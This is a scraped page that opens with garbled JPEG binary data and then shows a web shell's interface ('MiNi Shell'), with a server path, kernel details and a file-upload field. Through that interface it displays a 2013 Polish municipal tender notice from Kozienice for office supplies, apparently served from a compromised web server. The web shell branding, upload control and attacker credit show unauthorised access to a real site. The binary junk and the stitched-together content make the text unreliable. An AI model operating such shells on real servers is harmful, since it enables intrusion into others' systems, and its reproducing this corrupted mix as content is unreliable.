JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130122/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130122/31128-N-2013.html

<p class="kh_header"><b>Kozienice: Dostawa materiałów biurowych dla Urzędu Miejskiego w Kozienicach</b><br>
<b>Numer ogłoszenia: 31128 - 2013; data zamieszczenia: 22.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy Kozienice , ul. Parkowa 5, 26-900 Kozienice, woj. mazowieckie, tel. 048 6117100, faks 048 6142048.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kozienice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych dla Urzędu Miejskiego w Kozienicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Nazwa zamówienia nadana przez Zamawiającego: Dostawa materiałów biurowych dla Urzędu Miejskiego w Kozienicach.
2.Zamówienie dotyczy dostawy poszczególnych asortymentów przedmiotu zamówienia 
zgodnie z bieżącym zapotrzebowaniem Zamawiającego.
3.Wykonawca niezwłocznie, najpóźniej do 2 dni po otrzymaniu od zamawiającego powiadomienia w formie telefonicznej, faksem, pocztą elektroniczna bądź zwykła przesyłka przygotuje zamówiony towar i dostarczy do siedziby Zamawiającego wraz z dokumentami potwierdzającymi ich jakość.
3.Przedmiotem zamówienia jest dostarczenie materiałów biurowych fabrycznie nowych, posiadających znak firmowy producenta 
4.Zamawiający dopuszcza materiały równoważne od podanych w tabeli kolumna 2  pod warunkiem, że nie będą jakościowo gorsze od żądanych materiałów. 
5.Towar uważa się za dostarczony, jeżeli będzie dowieziony, złożony w miejscu wskazanym przez Zamawiającego, przeliczony i sprawdzony w obecności Zamawiającego i Wykonawcy oraz potwierdzony na dokumencie dostawy przez Zamawiającego.

1. Notatnik z wyrywanymi kartkami A-4 - 100 kartek szt. 120
2. Notatnik z wyrywanymi kartkami A-5 - 100 kartek szt. 100
3. Cienkopisy typu STABILO (czarny, czerwony, niebieski, zielony) grubość linii  0,4 mm szt. 400
4. Długopisy typu PENTEL  żelowe*	szt. 500
5. Długopisy typu PENACRB-085 szt. 500
6. Długopis typu S-FINE  059 szt. 400
7. Długopis z przymocowaniem do blatu typu Luxus szt. 100
8. Długopis typu BIG CRISTAL medium szt.	 400
9. Grzbiety do bindownicy   Nr  10,14,16,20,25,28. op. 12
10. Gumki ołówkowe typu PENTEL szt. 200
11. Koszulki do segregatorów  A-4 groszkowa 48 mikronów 1 opak. - 100 szt.
op. 300
12. Koszulki z perforacją do wpinania A-4	szt. 600
13. Klej w sztyfcie 25 g.  typu HINOL szt.	500
14. Korektor w taśmie szt. 400
15. Korektor w płynie szt. 200
16. Koperty białe pakowane po 250 szt. B-4 samoprzylepne	op. 4
17. Koperty białe C-6 samoprzylepne pakowane po 1000 szt. op. 60
18. Koperty białe C-5 samoprzylepne pakowane po 500 szt.	op. 15
19. Koperty białe C-4 samoprzylepne pakowane po 250 szt.	op. 15
20. Koperta bąbelkowa propac  A - 5 szt.	500
21. Koperta CD NK biała	 szt. 200
22. Bloczki samoprzylepnych karteczek na notatki szt. 600
23. Bloczki notatkowe szt. 600
24. Klamry klipy 51 mm w opakowaniu 12 szt. op. 50
25. Klamry klipy 41 mm w opakowaniu 12 szt. op. 50
26. Klamry klipy 32 mm w opakowaniu  12 szt. op. 50
27. Klamry klipy 25 mm w opakowaniu 12 szt. op. 50
28. Klamry klipy 19 mm w opakowaniu 12 szt. op. 50
29. Klamry klipy 15 mm w opakowaniu 12 szt. op. 50
30. Linijka 30 cm plastikowa kolorowa szt.	100
31. Zakreślacz typu  DONAU  kolorowy szt. 200
32. Marker typu PENTEL wodoodporny-czarny szt. 200
33. Marker CD/DVD  M854 czarny szt. 100
34. Ofertówka z kolorowym spodem A-4 szt. 600
35. Ołówek zwykły 2B szt. 300
36. Ołówek automat typu PENAC  RB-085M szt. 300
37. Spinacze biurowy 28 mm opakowanie 100 szt. op.	300
38. Spinacze 50 mm opakowanie 100 szt. 	op. 100
39. Skoroszyty plastikowe sztywne kolorowe A-4 szt.	400
40. Skoroszyty plastikowy sztywny  z europerforacją kolorowy A-4 szt.	600
41. Skoroszyty do segre- gatorów papierowe gramatura 300 g. szt. 500
42. Skoroszyt papierowy gramatura 300g szt. 1500
43. Segregatory A-4 szer. 7cm oklejane polipropylenem a wewnątrz karton  różne kolory z wymienną kartą opisową szt. 500
44. Segregatory A-4 szer 5 cm  laminowane różne kolory z wymienną kartą opisową	szt. 500
45. Segregator PP Panorama biały A4 /4DR/50 typu ESSELTE szt.	30
46.Segregator PP Panorama biały A4 /4R/25MM typu ESSELTE szt. 30
47. Sznurek jutowy 10DKG szt. 130
48. Teczki z gumką biała gramatura 300 g	szt. 500
49. Teczka wiązana biała gramatura 300 g szt.	2000
50. Teczka twarda A-4 na dokumenty min. 200 stron na rzep. szt	200
51. Taśma do maszyny licz. (57) Rolka Dalton szt. 500
52. Taśma biurowa samoklejąca przezroczysta szer. 12 mm szt. 200
53. Taśma biurowa samoklejąca przezroczysta szer.24 mm szt. 200
54. Wkłady do ołówków typu PENAC RB -085M (grafit) 0,5 szt. 100
55. Wkłady do długopisów typu PENTEL żelowe (niebieski, czarny)z lp. 4	szt. 500
56. Wkłady do długopisów typu S-FINE  059 z lp. 6 szt. 500
57. Wkłady do długopisów typu PENAC/nieb , czarny/ z lp. 5 szt. 400
58. Wkłady do długopisów  typu BIG CRISTAL medium z lp. 8 szt. 400
59. Zszywki 24/6 opakowanie 1000 szt. op. 200
60. Zeszyt B-5 160 kart. (kratka) - twarda oprawa szt. 20
61. Zeszyt A-5 96 kart. (twarda opr.) szt. 100
62. Zeszyt A-5 16 kart. szt. 100
63. Zeszyt A-5 32 kart.	szt. 50
64. Zeszyt  A-4 96 kart. Twarda oprawa szt. 150
65. Wąsy skoroszytowe	szt. 250
66. Papier A-4  500/A4/80g/m typu Pollux Klasa B , Białość CIE 161 Jasność D 65 z UV% 110?2 Wilg. 3,0 - 5,0% , Grubość ?m 104?3 ,Nieprzezroczystość 92 %, Gładkość cm3/1min 220?60 Ryza 2000
67. Papier A-3  500/A3/80g/m jakość j.w.	Ryza	250
68. Papier A-5 500/A5/80g/m jakość j.w. Ryza 100
69. Karton wizytówkowy A-4 gramatura 230g/m2 szt.	2000
70. Papier do plotera format A-1 gramatura 80g/m2 rolka 6 
71. Papier do plotera format A-0 gramatura 80g/m2 rolka 6.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.70.00-6, 30.19.76.44-2, 30.19.20.12-5, 30.19.21.21-5, 30.19.21.23-9, 30.19.21.00-2, 30.19.21.16-0, 30.19.92.30-1, 30.19.71.10-0, 30.19.21.30-1, 30.19.21.31-8, 30.19.72.20-4, 22.85.10.00-0, 30.19.95.00-5, 30.19.76.10-5, 30.14.51.00-8, 30.19.21.32-5, 30.19.71.00-7, 30.19.93.10-6, 22.81.63.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	stosowne Pełnomocnictwo do reprezentacji - jeżeli osoby podpisujące ofertę działają na podstawie pełnomocnictwa - musi zostać ono złożone jako część oferty w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza,
b)	dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie
zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego - w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania następujących zmian postanowień zawartej umowy w  stosunku do treści oferty:
1.	gdy wystąpiły takie okoliczności, których nie można było przewidzieć w chwili zawarcia umowy i na które strony nie miały wpływu,
2.	gdy nastąpi zmiana stawki podatku VAT przez władzę ustawodawczą w trakcie trwania umowy, wynikającej ze zmiany ustawy o podatku od towarów i usług oraz podatku akcyzowego.
3.	gdy nastąpi zmiana formy organizacyjno - prawnej Wykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.kozienice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Kozienicach, ul. Parkowa 5, 26-900 Kozienice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.01.2013 godzina 11:45, miejsce: Urząd Miejski w Kozienicach, ul. Parkowa 5, 26-900 Kozienice.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com